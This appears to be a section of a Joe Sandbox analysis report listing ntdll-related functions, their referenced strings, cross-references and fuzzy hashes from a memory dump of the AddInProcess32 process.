Opcode Fuzzy Hash: e5daf48fb83f56187231b9ba7321497dee928d0115f10d79a6a227ccafa18a72
Instruction Fuzzy Hash: 3F926B75608342ABE721DF28C880F6BB7E8BF84755F04892DFA98D7251D770E944CB92

Function 01988620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON

Download Yara Rule

Strings

Thread identifier, xrefs: 019C553A
Critical section debug info address, xrefs: 019C541F, 019C552E
undeleted critical section in freed memory, xrefs: 019C542B
double initialized or corrupted critical section, xrefs: 019C5508
Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 019C54CE
Thread is in a state in which it cannot own a critical section, xrefs: 019C5543
Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 019C540A, 019C5496, 019C5519
Invalid debug info address of this critical section, xrefs: 019C54B6
8, xrefs: 019C52E3
Address of the debug info found in the active list., xrefs: 019C54AE, 019C54FA
corrupted critical section, xrefs: 019C54C2
Critical section address., xrefs: 019C5502
Critical section address, xrefs: 019C5425, 019C54BC, 019C5534
First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 019C54E2

Memory Dump Source

Source File: 00000003.00000002.2461768164.0000000001920000.00000040.00001000.00020000.00000000.sdmp, Offset: 01920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1920000_AddInProcess32.jbxd

Similarity

API ID:
String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
API String ID: 0-2368682639
Opcode ID: aa3c1c9fa5db81255b8f4c10092a32588403bcafe042201a919dc5bb5b2b3424
Instruction ID: 68bdf453857d56accfd0a6c26c21330815da161834cfa2dfade54b6a4f4e8685
Opcode Fuzzy Hash: aa3c1c9fa5db81255b8f4c10092a32588403bcafe042201a919dc5bb5b2b3424
Instruction Fuzzy Hash: 08818AB0A00359EFEB20CF99C845FAEBBB9BB88B14F11415DF548B7641D371A941CB61

Function 019829F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON

Download Yara Rule

Strings

SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 019C2412
SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 019C25EB
SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 019C2624
RtlpResolveAssemblyStorageMapEntry, xrefs: 019C261F
SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 019C24C0
SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 019C2409
SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 019C22E4
SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 019C2498
SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 019C2506
@, xrefs: 019C259B
SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 019C2602

Memory Dump Source

Source File: 00000003.00000002.2461768164.0000000001920000.00000040.00001000.00020000.00000000.sdmp, Offset: 01920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1920000_AddInProcess32.jbxd

Similarity

API ID:
String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
API String ID: 0-4009184096
Opcode ID: 851744e9daa299507097018131b0f3af7ab3bf2f354451270f1bc8dac8bda855
Instruction ID: a2dfd6dd859d90e7ea75d82bf254c3d4707bbc969a7ac1d7941f470491203778
Opcode Fuzzy Hash: 851744e9daa299507097018131b0f3af7ab3bf2f354451270f1bc8dac8bda855
Instruction Fuzzy Hash: 1B026FF1D042299FDB21DB54CD80BAAB7B8AF54704F0045EAA64DA7241DB70AE84CF69

Function 01A00274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON

Download Yara Rule

Strings

About to rellocate block at %p to 0x%Ix bytes with tag %ws, xrefs: 01A004D3
RtlReAllocateHeap, xrefs: 01A002BF, 01A00362
HEAP[%wZ]: , xrefs: 01A00399, 01A004A8, 01A005D0, 01A00675, 01A006CC
Just reallocated block at %p to %Ix bytes, xrefs: 01A005F1
HEAP: , xrefs: 01A003A6, 01A004B5, 01A005DD, 01A00682, 01A006D9
About to reallocate block at %p to %Ix bytes, xrefs: 01A003BA
Invalid allocation size - %Ix (exceeded %Ix), xrefs: 01A006EA
Just reallocated block at %p to 0x%Ix bytes with tag %ws, xrefs: 01A0069F

Memory Dump Source

Source File: 00000003.00000002.2461768164.0000000001920000.00000040.00001000.00020000.00000000.sdmp, Offset: 01920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1920000_AddInProcess32.jbxd

Similarity

API ID:
String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
API String ID: 0-1700792311
Opcode ID: ffdd66bd1fcc2d9acd7e7995e65389ad33a252e35b022f07e19033ff734e5d87
Instruction ID: 10b3e7a2a3b8cd1a186d5c87c1386dd3be513a8073e44874e2cce7ed25d1e7eb
Opcode Fuzzy Hash: ffdd66bd1fcc2d9acd7e7995e65389ad33a252e35b022f07e19033ff734e5d87
Instruction Fuzzy Hash: 1CD1EF39500681EFDB22DFB8E540BA9BBF1FF8A754F098049F44A9B292C775D981CB14

Function 019D89B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON

Download Yara Rule

Strings

AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 019D8A3D
AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 019D8A67
VerifierDlls, xrefs: 019D8CBD
VerifierFlags, xrefs: 019D8C50
HandleTraces, xrefs: 019D8C8F
VerifierDebug, xrefs: 019D8CA5
AVRF: -*- final list of providers -*- , xrefs: 019D8B8F

Memory Dump Source

Source File: 00000003.00000002.2461768164.0000000001920000.00000040.00001000.00020000.00000000.sdmp, Offset: 01920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1920000_AddInProcess32.jbxd

Similarity

API ID:
String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
API String ID: 0-3223716464
Opcode ID: bc1671b2a1708a817eac7b38e05314f51b6f0a6f636fda81ea98c9b86fb7b8ef
Instruction ID: 834664f6f252ea1a2272ae0d8187e7561c2527414014de65b137e866175573a8
Opcode Fuzzy Hash: bc1671b2a1708a817eac7b38e05314f51b6f0a6f636fda81ea98c9b86fb7b8ef
Instruction Fuzzy Hash: 33911576A45712EFD721EF688880F5B77E8ABD4714F058829FA4D6B282C730EC01C795

Function 019863FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON

Download Yara Rule

Strings

NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop, xrefs: 019C41FE
Process initialization failed with status 0x%08lx, xrefs: 019C413A
Delaying execution failed with status 0x%08lx, xrefs: 019C4258
LDR:MRDATA: Process initialization failed with status 0x%08lx, xrefs: 019C40D8
_LdrpInitialize, xrefs: 019C40DF, 019C4141, 019C4205, 019C425F
minkernel\ntdll\ldrinit.c, xrefs: 019C40E9, 019C414B, 019C420F, 019C4269

Memory Dump Source

Source File: 00000003.00000002.2461768164.0000000001920000.00000040.00001000.00020000.00000000.sdmp, Offset: 01920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1920000_AddInProcess32.jbxd

Similarity

API ID:
String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
API String ID: 0-792281065
Opcode ID: 2430057b2b913270db94cd201da69dfa7c422b6a7ef33eecce9081c3763828b8
Instruction ID: 0cc595ec0400ab9f93a181084bdc111abff5c21970e1847041c394f196a60cb5
Opcode Fuzzy Hash: 2430057b2b913270db94cd201da69dfa7c422b6a7ef33eecce9081c3763828b8
Instruction Fuzzy Hash: 0F912674B00315DBEB25EF6CD855BAE7BA6BFD1F25F00002CE98D6B281D7659802C792

Function 0194645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON

Download Yara Rule

Strings

Loading the shim engine DLL failed with status 0x%08lx, xrefs: 019A9A2A
apphelp.dll, xrefs: 01946496
Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 019A99ED
Getting the shim engine exports failed with status 0x%08lx, xrefs: 019A9A01
minkernel\ntdll\ldrinit.c, xrefs: 019A9A11, 019A9A3A
LdrpInitShimEngine, xrefs: 019A99F4, 019A9A07, 019A9A30

Memory Dump Source

Source File: 00000003.00000002.2461768164.0000000001920000.00000040.00001000.00020000.00000000.sdmp, Offset: 01920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1920000_AddInProcess32.jbxd

Similarity

API ID:
String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-204845295
Opcode ID: fbb4bdb01914f4f7ec2ffb4efd85e67f021e2ce0a622f0d8d7374b8db84a0d6c
Instruction ID: c232185bc70ec0ebd3a94e504f62098e7e96d50e9189b8e77096fca77b932371
Opcode Fuzzy Hash: fbb4bdb01914f4f7ec2ffb4efd85e67f021e2ce0a622f0d8d7374b8db84a0d6c
Instruction Fuzzy Hash: E0519E752083059FE724DF28D851EAB7BE8BFC5648F40491EF58D9B1A0E630E909CB92

Function 0198C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

Unable to build import redirection Table, Status = 0x%x, xrefs: 019C81E5
Loading import redirection DLL: '%wZ', xrefs: 019C8170
LdrpInitializeProcess, xrefs: 0198C6C4
minkernel\ntdll\ldrinit.c, xrefs: 0198C6C3
LdrpInitializeImportRedirection, xrefs: 019C8177, 019C81EB
minkernel\ntdll\ldrredirect.c, xrefs: 019C8181, 019C81F5

Memory Dump Source

Source File: 00000003.00000002.2461768164.0000000001920000.00000040.00001000.00020000.00000000.sdmp, Offset: 01920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1920000_AddInProcess32.jbxd

Similarity

API ID:
String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
API String ID: 0-475462383
Opcode ID: d62bf91ce77d0c866a5cddd1b49ac2db9a4d0738fdde5c8a92e20a2d6e37e0a6
Instruction ID: 7d62a70c81a9444187d7ad6a823e9437172f13b6a438515e55afbe1202cf9e91
Opcode Fuzzy Hash: d62bf91ce77d0c866a5cddd1b49ac2db9a4d0738fdde5c8a92e20a2d6e37e0a6
Instruction Fuzzy Hash: 7B3112716443069FC224EF28D946E2ABBE4FFD0B14F04056CF98DAB291E621EC05C7A2

Function 01982674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 019C21BF
SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 019C219F
RtlGetAssemblyStorageRoot, xrefs: 019C2160, 019C219A, 019C21BA
SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 019C2180
SXS: %s() passed the empty activation context, xrefs: 019C2165
SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 019C2178

Memory Dump Source

Source File: 00000003.00000002.2461768164.0000000001920000.00000040.00001000.00020000.00000000.sdmp, Offset: 01920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1920000_AddInProcess32.jbxd

Similarity

API ID:
String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
API String ID: 0-861424205
Opcode ID: 3b4214097cd09cfd470847a5ec96499c9ff2d5d4003ff55be0cdf6676844eca8
Instruction ID: 33b253ca8a20ff191d1fe30528e77fc68752d5ef52bd7d12138c37a3ee13372a
Opcode Fuzzy Hash: 3b4214097cd09cfd470847a5ec96499c9ff2d5d4003ff55be0cdf6676844eca8
Instruction Fuzzy Hash: C431487AF402157BE721AF9A8C81F6B7B79EBD5E40F05405DBB0DA7140D270AA01C3A2

Function 0195A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON

Download Yara Rule

Strings

8, xrefs: 0195A3E7
LdrResFallbackLangList Exit, xrefs: 0195A3FF
LdrResFallbackLangList Enter, xrefs: 0195A3EF
6, xrefs: 0195A3F7

Memory Dump Source

Source File: 00000003.00000002.2461768164.0000000001920000.00000040.00001000.00020000.00000000.sdmp, Offset: 01920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1920000_AddInProcess32.jbxd

Similarity

API ID:
String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
API String ID: 0-379654539
Opcode ID: 6e3db188975d8d6956ebb4b1fd31d3bd3d11c19598cf82be4387cc402c73ccf5
Instruction ID: 9829956f087804f5adceb662bab791acf8dd0aca6c9100854c6bdeb56deef695
Opcode Fuzzy Hash: 6e3db188975d8d6956ebb4b1fd31d3bd3d11c19598cf82be4387cc402c73ccf5
Instruction Fuzzy Hash: CBC1B070508382CFD751CF58C140B6ABBE4FF84704F044A69FD99AB251E734D946CB5A

Function 01988402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON

Download Yara Rule

Strings

LdrpInitializeProcess, xrefs: 01988422
\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0198855E
@, xrefs: 01988591
minkernel\ntdll\ldrinit.c, xrefs: 01988421

Memory Dump Source

Source File: 00000003.00000002.2461768164.0000000001920000.00000040.00001000.00020000.00000000.sdmp, Offset: 01920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1920000_AddInProcess32.jbxd

Similarity

API ID:
String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
API String ID: 0-1918872054
Opcode ID: eec698214eeb4343b84f4bcf2facd205f3012e322062a7c2fd667a6c5035c66f
Instruction ID: 350a538b866b3ff9f6221a2ff22014ca8152a68d50a1c637055b6ab8fa622b17
Opcode Fuzzy Hash: eec698214eeb4343b84f4bcf2facd205f3012e322062a7c2fd667a6c5035c66f
Instruction Fuzzy Hash: 81915E71609345AFEB21EB65CC40E6BBAECBFD4654F80092EFA8C96151E334D904CB62

Function 0198273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON

Download Yara Rule

Strings

.Local, xrefs: 019828D8
RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 019C21D9, 019C22B1
SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 019C22B6
SXS: %s() passed the empty activation context, xrefs: 019C21DE

Memory Dump Source

Source File: 00000003.00000002.2461768164.0000000001920000.00000040.00001000.00020000.00000000.sdmp, Offset: 01920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1920000_AddInProcess32.jbxd

Similarity

API ID:
String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
API String ID: 0-1239276146
Opcode ID: 9ca18901a368ef1b65c7871fec210435007c0fab040f1543ae885351890b505d
Instruction ID: 6a54b32e3e4e1ef73b1d6d6a2d2d9b0047837136ff630aba790810ac2a626a3f
Opcode Fuzzy Hash: 9ca18901a368ef1b65c7871fec210435007c0fab040f1543ae885351890b505d
Instruction Fuzzy Hash: F2A1D035900229DBDB25DF68CC84BA9B3B9BF58714F2441EAD94CAB251D731AE80CF91

Function 019564AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON

Download Yara Rule

Strings

ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 019B0FE5
ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 019B106B
ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 019B1028
ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 019B10AE

Memory Dump Source

Source File: 00000003.00000002.2461768164.0000000001920000.00000040.00001000.00020000.00000000.sdmp, Offset: 01920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1920000_AddInProcess32.jbxd

Similarity

API ID:
String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
API String ID: 0-1468400865
Opcode ID: a4bde851ce28650cad51ce8a354d77dfc9762ae0d2c8b3f309c83436e2d376c6
Instruction ID: 925d9e9dbf0d8de2001f2b994d6b3d90f0e2d9246151b609d2d4a1ff86f27403
Opcode Fuzzy Hash: a4bde851ce28650cad51ce8a354d77dfc9762ae0d2c8b3f309c83436e2d376c6
Instruction Fuzzy Hash: FA71ECB1944305AFCB61DF18C884F9B7BA8AF94768F800868FD4D8B246D734D589CBD2

Function 0197245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON

Download Yara Rule

Strings

LdrpDynamicShimModule, xrefs: 019BA998
Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 019BA992
apphelp.dll, xrefs: 01972462
minkernel\ntdll\ldrinit.c, xrefs: 019BA9A2

Memory Dump Source

Source File: 00000003.00000002.2461768164.0000000001920000.00000040.00001000.00020000.00000000.sdmp, Offset: 01920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1920000_AddInProcess32.jbxd

Similarity

API ID:
String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-176724104
Opcode ID: 2b2347f5c30a53ea078da8d291936fa5650dab783055e54ae562b1673ce311c7
Instruction ID: d3b590b658bd3acfc776f1703ea7c3fe73ccca6b5dbbe68af5e79b1cfc331691
Opcode Fuzzy Hash: 2b2347f5c30a53ea078da8d291936fa5650dab783055e54ae562b1673ce311c7
Instruction Fuzzy Hash: 6C31577DA00201EBEB36DF5DC981EAABBB9FFC4B00F250019F90967245C7719942C790

Function 019629A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON

Download Yara Rule

Strings

HEAP[%wZ]: , xrefs: 01963255
HEAP: , xrefs: 01963264
Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0196327D

Memory Dump Source

Source File: 00000003.00000002.2461768164.0000000001920000.00000040.00001000.00020000.00000000.sdmp, Offset: 01920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1920000_AddInProcess32.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
API String ID: 0-617086771
Opcode ID: 23e09a6180f109a369d615fb7e1154e1b189b0688c976ee3ebba212f298c6212
Instruction ID: d4c58e80195d7014bf6b02d0eb2715b2c1ac1a25474837abd4af5ad5d3e8fb4f
Opcode Fuzzy Hash: 23e09a6180f109a369d615fb7e1154e1b189b0688c976ee3ebba212f298c6212
Instruction Fuzzy Hash: B592BB71A042499FDB25CF68C444BAEBBF9FF49300F188469E84DAB391D735AA45CF60

Function 01960770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON

Download Yara Rule

Strings

HEAP[%wZ]: , xrefs: 019B50AE
HEAP: , xrefs: 019B50BD
(UCRBlock->Size >= *Size), xrefs: 019B50CA

Memory Dump Source

Source File: 00000003.00000002.2461768164.0000000001920000.00000040.00001000.00020000.00000000.sdmp, Offset: 01920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1920000_AddInProcess32.jbxd

Similarity

API ID:
String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-4253913091
Opcode ID: e2bacca1a9f86a1548ca0fd417b288a63d2935f4c32492742d5b2fe393e96bc7
Instruction ID: ca419e63329eca0bc6e6239be77dfdf3079695a7fca0b70adad1e5855d8f6f0d
Opcode Fuzzy Hash: e2bacca1a9f86a1548ca0fd417b288a63d2935f4c32492742d5b2fe393e96bc7
Instruction Fuzzy Hash: 31F1BF34A00606DFEB15CF68C9D4FAAB7B9FF44304F184569E51A9B381D734E981CBA1

Function 0194A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON

Download Yara Rule

Strings

UseFilter, xrefs: 0194A1C1
\??\, xrefs: 019AC1E4
FilterFullPath, xrefs: 019AC2E6

Memory Dump Source

Source File: 00000003.00000002.2461768164.0000000001920000.00000040.00001000.00020000.00000000.sdmp, Offset: 01920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1920000_AddInProcess32.jbxd

Similarity

API ID:
String ID: FilterFullPath$UseFilter$\??\
API String ID: 0-2779062949
Opcode ID: e0c1cd7ad9b12eed26d2e5bfb38ebcaf34edd76639458dfbb2a5abc21b519817
Instruction ID: 073cec6fa0f638dee11d03b9931ec2352cef58679fd085fa2f3be295ff15fd24
Opcode Fuzzy Hash: e0c1cd7ad9b12eed26d2e5bfb38ebcaf34edd76639458dfbb2a5abc21b519817
Instruction Fuzzy Hash: 38A16C769112299BDB31DF68CC88BEAB7B8EF44711F1001E9E90DAB250D7359E84CF90

Function 0198C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON

Download Yara Rule

Strings

LdrpInitializePerUserWindowsDirectory, xrefs: 019C82DE
Failed to reallocate the system dirs string !, xrefs: 019C82D7
minkernel\ntdll\ldrinit.c, xrefs: 019C82E8

Memory Dump Source

Source File: 00000003.00000002.2461768164.0000000001920000.00000040.00001000.00020000.00000000.sdmp, Offset: 01920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1920000_AddInProcess32.jbxd

Similarity

API ID:
String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
API String ID: 0-1783798831
Opcode ID: e9501d0d92cd62fde945c06f9b4a9cd71bda8fa805af2867d78bd0e09f98d789
Instruction ID: 9a8b0e369a196dba52cc9440fa21aae882d444e71a7cd0d96880e201ab439011
Opcode Fuzzy Hash: e9501d0d92cd62fde945c06f9b4a9cd71bda8fa805af2867d78bd0e09f98d789
Instruction Fuzzy Hash: 8D41D079544311ABDB21FB68D844F9B77E8EFC9A50F00492AF94DD7250E771D801CBA2

Function 01A0C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON

Download Yara Rule

Strings

PreferredUILanguages, xrefs: 01A0C212
@, xrefs: 01A0C1F1
\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 01A0C1C5

Memory Dump Source

Source File: 00000003.00000002.2461768164.0000000001920000.00000040.00001000.00020000.00000000.sdmp, Offset: 01920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1920000_AddInProcess32.jbxd

Similarity

API ID:
String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
API String ID: 0-2968386058
Opcode ID: f891c2eb4bbb5066266342af96a618277b5a25c1ae1c496edc60aa3104749f02
Instruction ID: eef0aa22f500318a61f9e32b6561d4f5ef89779a24c6ead69fd78e3b68680ca5
Opcode Fuzzy Hash: f891c2eb4bbb5066266342af96a618277b5a25c1ae1c496edc60aa3104749f02
Instruction Fuzzy Hash: 5C418671D00209EBDF12EBD8D841FEEB7BCAB58710F1441AAE609F7684D7749A44CB50

Function 019E4144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

LdrpResValidateFilePath Exit, xrefs: 019E4172
@, xrefs: 019E4225
LdrpResValidateFilePath Enter, xrefs: 019E4160

Memory Dump Source

Source File: 00000003.00000002.2461768164.0000000001920000.00000040.00001000.00020000.00000000.sdmp, Offset: 01920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1920000_AddInProcess32.jbxd

Similarity

API ID:
String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
API String ID: 0-1373925480
Opcode ID: 74a0b50c630c08f96c2ec9d3a5528d7049cad6c4b9b59059725ba6adaeecca0f
Instruction ID: 2f96b9fa41b8cd49de2742fcb1f7f2cb8a011511005b166108622c842c47def7
Opcode Fuzzy Hash: 74a0b50c630c08f96c2ec9d3a5528d7049cad6c4b9b59059725ba6adaeecca0f
Instruction Fuzzy Hash: CB410471A00258CBEF26DBD9C858BADBBF8FFA5340F14045ADA09EB791D7349901CB10

Function 019D4755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

LdrpCheckRedirection, xrefs: 019D488F
Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 019D4888
minkernel\ntdll\ldrredirect.c, xrefs: 019D4899

Memory Dump Source

Source File: 00000003.00000002.2461768164.0000000001920000.00000040.00001000.00020000.00000000.sdmp, Offset: 01920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1920000_AddInProcess32.jbxd

Similarity

API ID:
String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
API String ID: 0-3154609507
Opcode ID: 9ff25ddbdb1447171062baea022a6fc88a1500b51b93631137701d270cad216f
Instruction ID: 07bd0f858da3fb3dd8d92cfc8a0db15f191af061df7ebc076fae7f4e80cc8191
Opcode Fuzzy Hash: 9ff25ddbdb1447171062baea022a6fc88a1500b51b93631137701d270cad216f
Instruction Fuzzy Hash: 4D41D236A043519FCB21CE5CD841E267BE9AF89A91F06856DED8DE7B11D731D800CB92

Function 019D20DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON

Download Yara Rule

Strings

LdrpInitializationFailure, xrefs: 019D20FA
Process initialization failed with status 0x%08lx, xrefs: 019D20F3
minkernel\ntdll\ldrinit.c, xrefs: 019D2104

Memory Dump Source

Source File: 00000003.00000002.2461768164.0000000001920000.00000040.00001000.00020000.00000000.sdmp, Offset: 01920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1920000_AddInProcess32.jbxd

Similarity

API ID:
String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
API String ID: 0-2986994758
Opcode ID: a8fa850cfca4be0130943e99414c4f246b7eff2058c2bb2dc6c41c06bdeecb87
Instruction ID: eb92f64f11e728bbd93a6b711bc13d320b630289a151629eea9baaaf241f1882
Opcode Fuzzy Hash: a8fa850cfca4be0130943e99414c4f246b7eff2058c2bb2dc6c41c06bdeecb87
Instruction Fuzzy Hash: C5F0F679640318BBEB24E75DDC46FA93B7CFBC0B54F104069FA4877685D6B0A901C691

Function 019603E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 019B4D8A

Strings

#%u, xrefs: 019B4D82

Memory Dump Source

Source File: 00000003.00000002.2461768164.0000000001920000.00000040.00001000.00020000.00000000.sdmp, Offset: 01920000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1920000_AddInProcess32.jbxd

Similarity

API ID: ___swprintf_l
String ID: #%u
API String ID: 48624451-232158463
